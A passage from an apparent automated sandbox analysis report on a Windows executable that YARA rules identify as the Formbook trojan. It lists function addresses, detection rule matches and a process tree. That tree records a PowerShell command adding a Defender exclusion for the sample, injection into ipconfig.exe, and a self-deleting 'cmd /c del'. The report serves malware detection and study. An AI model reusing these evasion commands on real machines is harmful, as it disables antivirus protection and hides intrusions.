            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0386C7C09_2_0386C7C0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038947509_2_03894750
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038707709_2_03870770
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0388C6E09_2_0388C6E0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_039305919_2_03930591
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038705359_2_03870535
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0391E4F69_2_0391E4F6
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_039144209_2_03914420
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_039224469_2_03922446
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03926BD79_2_03926BD7
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0392AB409_2_0392AB40
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0386EA809_2_0386EA80
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038729A09_2_038729A0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0393A9A69_2_0393A9A6
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038869629_2_03886962
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038568B89_2_038568B8
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0389E8F09_2_0389E8F0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038728409_2_03872840
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0387A8409_2_0387A840
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038EEFA09_2_038EEFA0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03862FC89_2_03862FC8
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0387CFE09_2_0387CFE0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03912F309_2_03912F30
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038B2F289_2_038B2F28
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03890F309_2_03890F30
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038E4F409_2_038E4F40
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0392CE939_2_0392CE93
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03882E909_2_03882E90
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0392EEDB9_2_0392EEDB
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0392EE269_2_0392EE26
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03870E599_2_03870E59
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03888DBF9_2_03888DBF
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0386ADE09_2_0386ADE0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0387AD009_2_0387AD00
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0390CD1F9_2_0390CD1F
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03910CB59_2_03910CB5
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03860CF29_2_03860CF2
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03870C009_2_03870C00
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038B739A9_2_038B739A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0392132D9_2_0392132D
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0385D34C9_2_0385D34C
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038752A09_2_038752A0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0388B2C09_2_0388B2C0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_039112ED9_2_039112ED
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0387B1B09_2_0387B1B0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A516C9_2_038A516C
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0385F1729_2_0385F172
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0393B16B9_2_0393B16B
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038770C09_2_038770C0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0391F0CC9_2_0391F0CC
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0392F0E09_2_0392F0E0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_039270E99_2_039270E9
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0392F7B09_2_0392F7B0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_039216CC9_2_039216CC
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0390D5B09_2_0390D5B0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_039275719_2_03927571
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0392F43F9_2_0392F43F
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038614609_2_03861460
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0388FB809_2_0388FB80
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038ADBF99_2_038ADBF9
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038E5BF09_2_038E5BF0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0392FB769_2_0392FB76
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038B5AA09_2_038B5AA0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03911AA39_2_03911AA3
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0390DAAC9_2_0390DAAC
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0391DAC69_2_0391DAC6
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03927A469_2_03927A46
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0392FA499_2_0392FA49
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038E3A6C9_2_038E3A6C
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_039059109_2_03905910
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038799509_2_03879950
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0388B9509_2_0388B950
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038738E09_2_038738E0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038DD8009_2_038DD800
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03871F929_2_03871F92
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0392FFB19_2_0392FFB1
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0392FF099_2_0392FF09
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03879EB09_2_03879EB0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0388FDC09_2_0388FDC0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03873D409_2_03873D40
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03921D5A9_2_03921D5A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03927D739_2_03927D73
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0392FCF29_2_0392FCF2
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038E9C329_2_038E9C32
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00E4D76A9_2_00E4D76A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00E4E77C9_2_00E4E77C
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00E32D909_2_00E32D90
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00E4ED759_2_00E4ED75
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00E39E4C9_2_00E39E4C
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00E39E509_2_00E39E50
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00E32FB09_2_00E32FB0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0369A0369_2_0369A036
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03695B309_2_03695B30
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03695B329_2_03695B32
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0369B2329_2_0369B232
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_036989129_2_03698912
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_036910829_2_03691082
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03692D029_2_03692D02
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0369E5CD9_2_0369E5CD
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 038DEA12 appears 86 times
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 038A5130 appears 58 times
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0385B970 appears 280 times
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 038EF290 appears 105 times
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 038B7E54 appears 102 times
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: String function: 01A5EA12 appears 86 times
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: String function: 019DB970 appears 280 times
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: String function: 01A37E54 appears 102 times
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: String function: 01A25130 appears 58 times
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: String function: 01A6F290 appears 105 times
            Source: JHnNxt6Pnb.exe, 00000000.00000002.1546274568.0000000007120000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs JHnNxt6Pnb.exe
            Source: JHnNxt6Pnb.exe, 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs JHnNxt6Pnb.exe
            Source: JHnNxt6Pnb.exe, 00000000.00000000.1522481407.0000000000672000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameJHk.exe6 vs JHnNxt6Pnb.exe
            Source: JHnNxt6Pnb.exe, 00000000.00000002.1538691770.0000000000E5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs JHnNxt6Pnb.exe
            Source: JHnNxt6Pnb.exe, 00000004.00000002.1670145600.0000000001ADD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs JHnNxt6Pnb.exe
            Source: JHnNxt6Pnb.exe, 00000004.00000002.1669942696.0000000001937000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs JHnNxt6Pnb.exe
            Source: JHnNxt6Pnb.exe, 00000004.00000002.1669646025.0000000001707000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs JHnNxt6Pnb.exe
            Source: JHnNxt6Pnb.exe, 00000004.00000002.1669646025.0000000001722000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs JHnNxt6Pnb.exe
            Source: JHnNxt6Pnb.exeBinary or memory string: OriginalFilenameJHk.exe6 vs JHnNxt6Pnb.exe
            Source: JHnNxt6Pnb.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.4011430051.00000000115F5000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
            Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: JHnNxt6Pnb.exe PID: 6796, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: JHnNxt6Pnb.exe PID: 964, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: ipconfig.exe PID: 5460, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: JHnNxt6Pnb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, iY9LscoqRNGQNby1ks.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, iY9LscoqRNGQNby1ks.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, iY9LscoqRNGQNby1ks.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, iY9LscoqRNGQNby1ks.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, iY9LscoqRNGQNby1ks.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, iY9LscoqRNGQNby1ks.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, iY9LscoqRNGQNby1ks.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, iY9LscoqRNGQNby1ks.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, iY9LscoqRNGQNby1ks.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, VB0K75NHNNnsBGRN1j.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, VB0K75NHNNnsBGRN1j.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, VB0K75NHNNnsBGRN1j.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@525/6@11/1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JHnNxt6Pnb.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5d0szuis.42b.ps1Jump to behavior
            Source: JHnNxt6Pnb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: JHnNxt6Pnb.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: JHnNxt6Pnb.exeReversingLabs: Detection: 68%
            Source: unknownProcess created: C:\Users\user\Desktop\JHnNxt6Pnb.exe "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess created: C:\Users\user\Desktop\JHnNxt6Pnb.exe "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe"Jump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess created: C:\Users\user\Desktop\JHnNxt6Pnb.exe "C:\Users\user\Desktop\JHnNxt6Pnb.exe"Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\JHnNxt6Pnb.exe"Jump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: kernel.appcore.dllJump to behavior
